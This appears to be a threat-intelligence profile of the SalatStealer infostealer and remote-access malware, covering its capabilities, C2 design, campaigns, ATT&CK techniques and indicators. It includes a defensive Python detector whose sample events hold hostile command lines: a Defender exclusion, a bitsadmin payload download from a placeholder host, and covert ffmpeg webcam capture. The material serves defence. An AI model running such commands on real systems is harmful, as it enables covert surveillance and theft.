SALATSTEALER
SalatStealer is a Go-based Windows malware family, often described as a Malware-as-a-Service infostealer that also includes substantial RAT functionality. Reported samples include UPX-packed or fake-UPX-labeled PE32 binaries. High-confidence capabilities described in the source material include theft of browser credentials, cookies, login data, local state files, authentication tokens, browser session data, cryptocurrency wallet data, Telegram Desktop data, Discord tokens, Steam data, clipboard contents, screenshots, and keylogged input. It targets more than 30 browsers in some reporting, including Chromium-family and Gecko-family browsers, and more than 24 cryptocurrency wallets and numerous wallet-related browser extensions. Reported RAT features include remote shell/command execution, screen capture and recording, webcam capture, microphone capture, hidden desktop interaction, file download, process control, SOCKS5 or P2P proxying, task scheduling, persistence, and self-deletion. Additional reported techniques include Registry Run key persistence, Task Scheduler persistence, Microsoft Defender exclusion abuse, LSASS targeting, token theft, privilege adjustment, COM elevation abuse, and browser secret decryption via DPAPI, App-Bound Encryption bypass, and NSS-related routines.
Its command-and-control design is notably resilient. Reporting states that SalatStealer encrypts its C2 configuration in the binary, resolves infrastructure at runtime via DNS-over-HTTPS, and communicates over WebSocket/HTTPS with QUIC/HTTP3 support. A later sample, yesamsevo.exe, reportedly added TON blockchain DNS resolution using tonutils-go, with fallback to Cloudflare DoH, and periodic re-resolution to rotate C2 infrastructure. Mentioned infrastructure and branding link the malware to the NyashTeam/WebRat MaaS operation, including domains such as nyash[.]team, salat[.]cn, salator[.]es, websalat[.]top, sa1at[.]ru, wrat[.]in, webrat[.]ru, and webrat[.]top, as well as Beget-hosted backend servers at 85.198.98.75 and 217.26.28.234. One report states NyashTeam marketed SalatStealer as WebRAT for about 1,199 RUB per month and used Telegram bots for sales and support.
Observed delivery and distribution vectors in the provided content include phishing and social-engineering campaigns, ClickFix-style fake Google Meet lures, GitHub-hosted payloads and scripts, compromised websites, archives containing executables, and exploitation of a WinRAR vulnerability identified as CVE-2025-8088. CERT-UA and Symantec-linked reporting associates SalatStealer with the UAC-0252 campaign impersonating Ukrainian government institutions and regional authorities, alongside SHADOWSNIFF and DEAFTICK. Other reporting shows SalatStealer being distributed through the Amadey botnet/pay-per-install campaign fbf543, alongside families such as Vidar, LummaStealer, QuasarRAT, XWorm, RustyStealer, and SantaStealer. McAfee also reported cases where a broader trojanized-software campaign ultimately delivered SalatStealer or Mesh Agent.
Targeting and victimology in the source material include Ukrainian government institutions and Ukrainian-speaking organizations in some campaigns, while other distribution activity is commodity cybercrime-oriented and broad. Detection-relevant behaviors explicitly mentioned include ffmpeg.exe abuse via the Windows DirectShow interface for device discovery and active webcam/video capture, use of PowerShell and BITSAdmin for staging, execution from temporary or user-writable directories, and collection/exfiltration of browser and wallet data. Specific file indicators mentioned for SalatStealer include main.exe SHA-256 c149a236ddf07fb96de1a893b8d09cdfdd2c28abfc4c3c17bb3ebd8c3c7b5cef, main.deupx.exe SHA-256 a4f1a6f8f5a407ea0113253b557a6dc75c35398edf21bbc5322c47ac1fd0b689, yesamsevo.exe SHA-256 8651bf3f8f38d547530e0dcdd89da904e14ee7bd87c05f5ff429038ba73013ef, and analyzed sample hashes ec2e071a6241ac4d12452070c37ffde5bd01650c6d9a5503d768cb583fea6756 and 30a50cc0f7b317c9734e6792e7e4ec174035d92031bdcc87a80ad8826adc60b2. Reported network indicators include salat[.]cn/sa1at/ and salator[.]ru/sa1at/.
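As an added example (not code from the original page or from any vendor's rule set), the detection-relevant behaviours listed above checked against constructed Sysmon-style process-creation records in Python; the command lines, paths and detection names are my own assumptions, not values taken from SalatStealer samples:

```python
from __future__ import annotations
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style)."""
    image: str          # full path of the created process
    command_line: str   # its command line

# Constructed sample telemetry; illustrative only, not copied from real samples.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\ffmpeg.exe",
              'ffmpeg.exe -list_devices true -f dshow -i dummy'),
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\ffmpeg.exe",
              'ffmpeg.exe -f dshow -i video="Integrated Camera" -t 30 C:\\Users\\alice\\AppData\\Local\\Temp\\cap.mp4'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden Add-MpPreference -ExclusionPath C:\\Users\\alice\\AppData\\Roaming'),
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe",
              'bitsadmin.exe /transfer job /download /priority high http://example.invalid/x.bin C:\\Users\\alice\\AppData\\Local\\Temp\\x.exe'),
    ProcEvent(r"C:\Program Files\ffmpeg\bin\ffmpeg.exe",
              'ffmpeg.exe -i in.mkv -c:v libx264 out.mp4'),   # benign transcode, must not alert
]

# Directories a standard user can write to; execution from these is a page-listed signal.
USER_WRITABLE = re.compile(r"\\(temp|appdata|programdata|public)\\", re.I)

def classify(ev: ProcEvent) -> list[str]:
    """Return the detection names an event matches (empty list if none)."""
    exe = ev.image.rsplit("\\", 1)[-1].lower()
    cmd = ev.command_line.lower()
    hits: list[str] = []
    if exe == "ffmpeg.exe" and "-f dshow" in cmd:
        if "-list_devices" in cmd:                      # camera/microphone discovery
            hits.append("ffmpeg_dshow_device_discovery")
        if re.search(r'-i\s+"?video=', cmd):            # active webcam capture
            hits.append("ffmpeg_dshow_video_capture")
    if exe in ("powershell.exe", "pwsh.exe") and "add-mppreference" in cmd and "-exclusion" in cmd:
        hits.append("defender_exclusion_added")         # Defender exclusion abuse
    if exe == "bitsadmin.exe" and "/transfer" in cmd and USER_WRITABLE.search(cmd):
        hits.append("bitsadmin_download_to_user_dir")   # BITSAdmin staging
    if hits and USER_WRITABLE.search(ev.image):         # enrich: suspicious binary in user-writable path
        hits.append("executed_from_user_writable_path")
    return hits

def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> detections, keeping only events that alerted."""
    results = {}
    for idx, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            results[idx] = hits
    return results

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].command_line, "->", hits)
```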
Vulnerabilities exploited
4 CVEs Mallory has correlated with this family across public research and vendor advisories.
UAC-0252 Campaign (Jan--Feb 2026): SalatStealer was deployed alongside three other tools in a campaign targeting Ukraine, tracked as UAC-0252 ... Initial vector: CVE-2025-8088 (WinRAR path traversal) distributed via the PalachPro Telegram channel.
A fresh SalatStealer sample (yesamsevo.exe) ships with a previously undocumented capability: resolving its C2 server address via TON blockchain DNS using tonutils-go.
Campaign Context: Distribution via Fake CVE PoCs (NyashTeam, Dec 2025 -- present). NyashTeam has been distributing SalatStealer through 15+ fake CVE proof-of-concept repositories on GitHub, including github[.]com/RedFoxNxploits/CVE-2025-10294-Poc, github[.]com/FixingPhantom/CVE-2025-10294, github[.]com/DExplo1ted/CVE-2025-12596-Exploit, and github[.]com/h4xnz/CVE-2025-55234-POC.
Groups observed using it
4 distinct threat actors attributed by public researchers.
The group's arsenal includes an infostealer named SHADOWSNIFF, a Malware-as-a-Service (MaaS) variant called SALATSTEALER, and DEAFTICK, a Go-based backdoor strain.
This analytic detects active video capture performed by FFmpeg (ffmpeg.exe) via the Windows DirectShow (dshow) interface, a technique observed in SalatStealer and related UAC-0252 campaigns.
Techniques & procedures
40 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (1 technique)
Initial Access (3 techniques)
They either deliver a compressed archive containing a malicious executable file directly, or they provide a link to a compromised website.
Execution (5 techniques)
On execution: mutex check (checkDupe), UAC bypass (Elevate), persistence via registry Run key and Task Scheduler...
The threat actor leverages PowerShell, BITSAdmin, and lightweight obfuscation techniques to stage and deploy SalatStealer.
Persistence (4 techniques)
MITRE ATT&CK mapping: Modify Registry (T1112), implemented as Registry Run key persistence and Defender exclusion bypass.
Privilege Escalation (5 techniques)
MITRE ATT&CK mapping: ... Process Injection (T1055), implemented via WriteProcessMemory and SetWindowsHookEx.
main.DuplicateUserTokenFromSessionID -- WTS token duplication
main.getSystemToken -- SYSTEM token acquisition
Stealth (7 techniques)
Defense Impairment (1 technique)
Credential Access (8 techniques)
main.NtQuerySystemHandles -- Handle enumeration (LSASS targeting)
main.findLsassProcess -- LSASS process location
main.runKeylogger -- Start capture
main.keyPressCallback -- SetWindowsHookEx WH_KEYBOARD callback
main.windowChangeCallback -- Active window change (context labeling)
Collection hits 34 browsers, 28 crypto wallets, Telegram/Discord/Steam tokens, keylogger with window context, screenshots, and clipboard.
The malware’s extensive browser and cryptocurrency wallet targeting highlights the continued operational focus on credential theft, session hijacking, and digital asset compromise.
MITRE ATT&CK mapping: Credentials in Files (T1552.001), implemented against browser profile data and wallet files.
Discovery (3 techniques)
MITRE ATT&CK mapping: System Information Discovery (T1082), implemented via Win32_Processor, Win32_LogonSession, and HWID.
Collection (6 techniques)
Command and Control (6 techniques)
The transport layer uses gorilla/websocket over HTTPS with QUIC/HTTP3 support (via quic-go). The C2 path is /saat/ with a WebSocket session protocol (wsSess) for bidirectional command execution.
Every infected host becomes a SOCKS5 proxy node:
main.(*socks5Conn).Serve -- SOCKS5 server
...
main.p2pSocks -- P2P SOCKS relay
The actual C2 connection uses WebSocket over TLS for command-and-control, and QUIC (HTTP/3) for bulk data exfiltration.
A tloop function implements a polling loop that periodically re-resolves via TON, meaning the operator can rotate infrastructure mid-campaign and all infected hosts will follow within one polling interval. This is Fast Flux DNS with the blockchain as the authoritative server.
Exfiltration (1 technique)
IOCs tracked for this family
40 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Recent activity
18 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A malware label applied in public threat intelligence to a hash linked to Tengu activity; the content suggests possible multi-use tooling or classification ambiguity rather than a clearly established separate role.
An information-stealing malware delivered via a ClickFix-style social engineering campaign that abuses legitimate Windows tools such as PowerShell and BITSAdmin. It targets browser data and cryptocurrency wallets to enable credential theft, session hijacking, and digital asset compromise.
A stealer malware family described as abusing FFmpeg on Windows to enumerate connected audio and video devices, likely as reconnaissance for covert audio/video surveillance or collection.
A stealer malware family associated here with webcam/video capture activity via FFmpeg and Windows DirectShow as part of collection and surveillance behavior.